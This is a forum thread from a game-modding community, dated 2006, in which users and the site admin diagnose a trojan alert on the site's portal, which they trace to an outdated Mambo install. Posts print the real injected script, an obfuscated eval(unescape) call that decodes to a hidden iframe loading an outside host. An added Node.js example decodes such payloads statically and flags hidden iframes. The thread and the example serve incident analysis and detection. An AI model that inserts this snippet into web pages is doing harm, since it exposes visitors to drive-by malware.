Author Topic: (Solved) Virus Alert when loading PPG main page  (Read 3797 times)

Offline Ashara

(Solved) Virus Alert when loading PPG main page
« on: July 30, 2006, 12:57:40 PM »
Guys, every time I load PPG main page I get alert for this virus:

http://www.f-secure.com/v-descs/exploit.shtml
Hang in there. I'll try to make you glad you did.
—George R.R. Martin

There is nothing better than imagining other worlds [...] to forget the painful one we live in. At least so I thought then. I hadn't yet realized that, imagining other worlds, you end up changing this one.
-Umberto Eco, Baudolino

Three mods you shall make - one too bad and one to dread and one to love.

Offline Phoenix

Re: Virus Alert when loading PPG main page
« Reply #1 on: July 30, 2006, 02:09:10 PM »
Yeah, happens to me too.

Offline berelinde

Re: Virus Alert when loading PPG main page
« Reply #2 on: July 30, 2006, 02:27:13 PM »
Yeah, my antiviral software caught it in a virus scan. But I thought it was because someone in my house was looking at smut. I guess that "someone" was me!

Offline cmorgan

Re: Virus Alert when loading PPG main page
« Reply #3 on: July 30, 2006, 03:20:13 PM »
Yep, confirmed here as well. McAfee keeps deleting the infected file, and gives the following info:

Exploit-ByteVerify

Virus Profile: Exploit-ByteVerify
Risk Assessment   
  - Home Users: Low
  - Corporate Users: Low
Date Discovered: 4/9/2003
Date Added: 4/22/2003
Origin: Unknown
Length: Varies
Type: Trojan
SubType: Exploit
DAT Required: 4258

Virus Characteristics
This detection covers Java applets that attempt to exploit the Microsoft Security Bulletin MS03-011 vulnerability. The severity of this vulnerability is considered to be critical. It allows an attacker to execute malicious code simply by visiting an infectious website. Detections of this exploit do not necessarily mean that any malicious code was executed. It simply means that a Java applet was found to contain the exploit code. Conversely, malicious code may have been run, which could result in any number of modifications to the system.
All vulnerable systems should apply the patch from Microsoft. Patched systems are immune from the effects of the exploit code. However, detection will still occur on files attempting to make use of this exploit.

Indications of Infection
There are no obvious signs of infection. AVERT has received field samples that use this exploit to create a registry script file, and merge it into the system registry. This script simply altered the default start page of Internet Explorer.
Method of Infection
This exploit makes use of a security vulnerability affecting Internet Explorer and certain email clients, such as Outlook and Outlook Express.

Offline jcompton

Re: Virus Alert when loading PPG main page
« Reply #4 on: July 30, 2006, 04:25:26 PM »
I'm going to guess this is a false positive, but I'll look into it.
Cespenar says, "Kelsey and friends be at the Pocket Plane? Ohhh yesssss!" http://www.pocketplane.net

Offline the bigg

Re: Virus Alert when loading PPG main page
« Reply #5 on: July 30, 2006, 04:31:59 PM »
Quote
I'm going to guess this is a false positive, but I'll look into it.

NoScript claims that www.pocketplane.net is trying to execute some script located somewhere at xp-update.net. The page code is obfuscated to hide its content, which is another thing hinting at malicious code having been implanted there (probably by a third-party cracker who used some kind of exploit - I'd recommend updating Mambo and having the whole LAMP stack updated, after removing the code that has been cracked in).

EDIT: I'd point my finger at this portion of code

Code:
<!-- Begin TrueStats Counter -->
<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%78%70%2D%75%70%64%61%74%65%2E%6E%65%74%2F%63%6F%75%6E%74%2F%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%20%77%69%64%74%68%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E%22%29"))</script>

<!-- End TrueStats Counter -->
It's right below the <body> item. I'll post a translation of the gibberish ASAP.

EDIT2:

the suspicious code unescaped:
Code:
document.write("<iframe src='http://xp-update.net/count/' frameborder='0' height='0' width='0'></iframe>")
Bingo.
Author or Co-Author: WeiDU (http://j.mp/bLtjOn) - Widescreen (http://j.mp/aKAiqG) - Generalized Biffing (http://j.mp/aVgw3U) - Refinements (http://j.mp/bLHoCc) - TB#Tweaks (http://j.mp/ba02Eg) - IWD2Tweaks (http://j.mp/98OFYY) - TB#Characters (http://j.mp/ak8J55) - Traify Tool (http://j.mp/g1Ry9A) - Some mods that I won't mention in public
Maintainer: Semi-Multi Clerics (http://j.mp/9UeIwB) - Nalia Mod (http://j.mp/dng9l0) - Nvidia Fix (http://j.mp/aRWjjg)
Code dumps: Detect custom secondary types (http://j.mp/hVzzXG) - Stutter Investigator (http://j.mp/gdtBn8)

If possible, send diffs, translations and other contributions using Git (http://j.mp/aBZFrq).
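A worked example of the decoding step the bigg did by hand, added here as an editor's illustration and not code from the thread or from the Pocket Plane site: a small Node.js script that finds eval(unescape("...")) payloads in a page, decodes them statically (no eval, so nothing from the page ever runs), pulls out any iframe tags from the decoded string, and flags the ones sized 0x0 or otherwise hidden. SAMPLE_HTML is constructed from the injected snippet quoted above plus a visible iframe to show what does not get flagged; the domain check is left to the caller, since only the site owner knows which hosts are expected.

```javascript
// Added example (not from the thread): static decoder for eval(unescape("..."))
// payloads plus a hidden-iframe check. SAMPLE_HTML is constructed from the
// injected snippet quoted in the thread; the "/forum/" iframe is a made-up
// benign frame so the output shows both a flagged and an unflagged result.

const SAMPLE_HTML = `<body>
<!-- Begin TrueStats Counter -->
<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%78%70%2D%75%70%64%61%74%65%2E%6E%65%74%2F%63%6F%75%6E%74%2F%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%20%77%69%64%74%68%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E%22%29"))</script>
<!-- End TrueStats Counter -->
<iframe src="/forum/" width="600" height="400"></iframe>`;

// Re-implementation of the legacy JS unescape(): %uXXXX first, then %XX.
// Malformed sequences are left as-is rather than throwing, so a deliberately
// broken payload still decodes as far as it can.
function safeUnescape(s) {
  return s
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Locate every eval(unescape("...")) / eval(unescape('...')) call and return
// the raw match alongside its decoded text. The page is never executed.
function findEvalUnescapePayloads(html) {
  const re = /eval\s*\(\s*unescape\s*\(\s*(["'])([^"']*)\1\s*\)\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    out.push({ raw: m[0], decoded: safeUnescape(m[2]) });
  }
  return out;
}

// Extract <iframe ...> tags from any text (markup or a decoded JS string)
// and parse their attributes into a lowercase-keyed object.
function extractIframes(text) {
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s'">]+))/g;
  const frames = [];
  let t;
  while ((t = tagRe.exec(text)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(t[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    frames.push(attrs);
  }
  return frames;
}

// A frame that cannot be seen has no legitimate reason to load a third party.
function isHidden(attrs) {
  const zero = v => v !== undefined && /^0(px)?$/i.test(v.trim());
  return zero(attrs.height) || zero(attrs.width) ||
    /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || '');
}

// Report every iframe on the page: those written plainly in the markup and
// those that only appear once an eval(unescape()) payload is decoded.
function analyzeHtml(html) {
  const findings = [];
  for (const f of extractIframes(html)) {
    findings.push({ src: f.src || '', hidden: isHidden(f), obfuscated: false });
  }
  for (const p of findEvalUnescapePayloads(html)) {
    for (const f of extractIframes(p.decoded)) {
      findings.push({ src: f.src || '', hidden: isHidden(f), obfuscated: true, decoded: p.decoded });
    }
  }
  return findings;
}

if (typeof module !== 'undefined') {
  module.exports = { safeUnescape, findEvalUnescapePayloads, extractIframes, isHidden, analyzeHtml };
  if (require.main === module) {
    console.log(JSON.stringify(analyzeHtml(SAMPLE_HTML), null, 2));
  }
}
```

Run it with `node` against a saved copy of the page (read the file in place of SAMPLE_HTML) rather than fetching the live site; the point of decoding statically is that the payload is never given to a JavaScript engine. A 0x0 iframe to a host you do not own, reached only through an eval(unescape()) wrapper, is the combination to treat as an injection rather than a counter script.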

Offline Captn_Immort

Re: Virus Alert when loading PPG main page
« Reply #6 on: July 30, 2006, 04:42:30 PM »
I have AVG installed here and it says it's a trojan.
...and yeah, it's executing some script :s It opens a DOS window :/
DialogChecker makes dealing with TRA. files a lot easier! New tool for translators and modders with multi-language mods.

CLAN DLAN, your friendly neighborhood spanish community. Woo!

If you need my assistance with a translation or update of a translation please send me a PM or email. Thanks!!

Offline jcompton

Re: Virus Alert when loading PPG main page
« Reply #7 on: July 30, 2006, 04:47:19 PM »
Yes, not a false positive, I've taken the portal offline and am working on addressing it.

Offline SimDing0™

Re: Virus Alert when loading PPG main page
« Reply #8 on: July 30, 2006, 04:56:50 PM »
G3 have a frontpage, and we have a forum.

Are you thinking what I'm thinking?! :)

Offline berelinde

Re: Virus Alert when loading PPG main page
« Reply #9 on: July 30, 2006, 05:06:28 PM »
Depends on what you're thinking.

But the issues could be entirely unrelated.

Offline Macready

Re: Virus Alert when loading PPG main page
« Reply #10 on: July 30, 2006, 05:47:17 PM »
Quote
Are you thinking what I'm thinking?! :)

PocketGibberling.eu
EasyTutu: Tutu installation made simple.

Offline Drew

Re: Virus Alert when loading PPG main page
« Reply #11 on: July 30, 2006, 05:48:10 PM »
Quote
Are you thinking what I'm thinking?! :)

I don't think that a joining of PPG and G3 would be the best idea, Sim.  As it stands now, PPG does most of its bickering with spellhold, while G3 bickers mostly with BWL.  If G3 and PPG were to merge, we would be flanked.
Poor baby. Couldn't find a fight anywhere else so you had to come here, huh. -Cybersquirt

Offline jcompton

Re: Virus Alert when loading PPG main page
« Reply #12 on: July 30, 2006, 06:07:31 PM »
Quick update: We've upgraded (migrated, actually, to different portal software) and will be working on getting the template modified for the new software so that the portal actually shows all the information it is supposed to. Things might look a little off for a few days, but I will prioritize getting the basic "here are the mods and here are the DL links" up. We should avoid the need for Compton's Hastily Assembled HTML this time.

It was probably a SQL injection vulnerability in the >2-year-old version of Mambo we were using.

The trojan seemed to be designed to hijack IE and take it to a different page, incidentally.

Offline berelinde

Re: Virus Alert when loading PPG main page
« Reply #13 on: July 30, 2006, 07:14:07 PM »
Quote
Are you thinking what I'm thinking?! :)
I don't think that a joining of PPG and G3 would be the best idea, Sim.  As it stands now, PPG does most of its bickering with spellhold, while G3 bickers mostly with BWL.  If G3 and PPG were to merge, we would be flanked.

Or unified, depending on your point of view.

The downside would be that if the site did go down for some reason, we players would not have a forum.

Offline jcompton

Re: Virus Alert when loading PPG main page
« Reply #14 on: July 30, 2006, 09:20:01 PM »
Almost back up and running. I have a very wonderful wife.

Offline jcompton

Re: (Solved) Virus Alert when loading PPG main page
« Reply #15 on: July 30, 2006, 10:16:14 PM »
Okay, well, that was exciting.

My apologies for the inconvenience, particularly to anybody who may have regrettably been affected by the trojan. The portal has been updated from the rickety old build of Mambo to a shiny new version of Joomla. There are some minor cosmetic changes with the ported template which we'll address or work around over the next few days, but the portal should at least Work again, without any bizarro code bogging it down.

Offline Avenger_teambg

Re: (Solved) Virus Alert when loading PPG main page
« Reply #16 on: July 31, 2006, 01:59:05 AM »
Well, eventually everyone gets screwed, congrats for recovering so fast.
Good to know why my browser cache contained seemingly false positive virus alerts :)

Offline Captn_Immort

Re: Virus Alert when loading PPG main page
« Reply #17 on: July 31, 2006, 02:40:59 AM »
Quote
The trojan seemed to be designed to hijack IE and take it to a different page, incidentally.

I'm curious.

Offline Ashara

Re: (Solved) Virus Alert when loading PPG main page
« Reply #18 on: July 31, 2006, 04:39:53 AM »
Thanks, JC. I guess it's time to go drink the health of the Admins who keep the sites afloat :)

Offline berelinde

Re: (Solved) Virus Alert when loading PPG main page
« Reply #19 on: July 31, 2006, 06:35:06 AM »
Ashara: at 4:39 AM? Maybe you could put it off a few hours ;D

Anyway, congratulations on the quick fix. That was hardly any time.

Offline jcompton

Re: (Solved) Virus Alert when loading PPG main page
« Reply #20 on: July 31, 2006, 08:31:07 AM »
Quote
Good to know why my browser cache contained seemingly false positive virus alerts :)

Every few months or so there's a "your mod has a virus in it" alert which is invariably somebody's virus scanner being overzealous about the WeiDU executable or an NSIS archive or something like that, so my first impulse was that this was another situation like that. But, it wasn't.

Quote
The trojan seemed to be designed to hijack IE and take it to a different page, incidentally.

I'm curious.

Scroll up, the bigg decodes the command and shows you what it was trying to do. Do not follow the link unless you are, like, using wget on a vxWorks machine or something equally safe.

Offline Ashara

Re: (Solved) Virus Alert when loading PPG main page
« Reply #21 on: July 31, 2006, 09:02:07 AM »
Quote
Ashara: at 4:39 AM? Maybe you could put it off a few hours.

Not if you are drinking coffee... which makes sense, seeing how it's the lifeblood of many a project.

Offline Captn_Immort

Re: (Solved) Virus Alert when loading PPG main page
« Reply #22 on: July 31, 2006, 09:57:08 AM »
Quote
The trojan seemed to be designed to hijack IE and take it to a different page, incidentally.

I'm curious.

Scroll up, the bigg decodes the command and shows you what it was trying to do. Do not follow the link unless you are, like, using wget on a vxWorks machine or something equally safe.

Oh, sorry, thanks.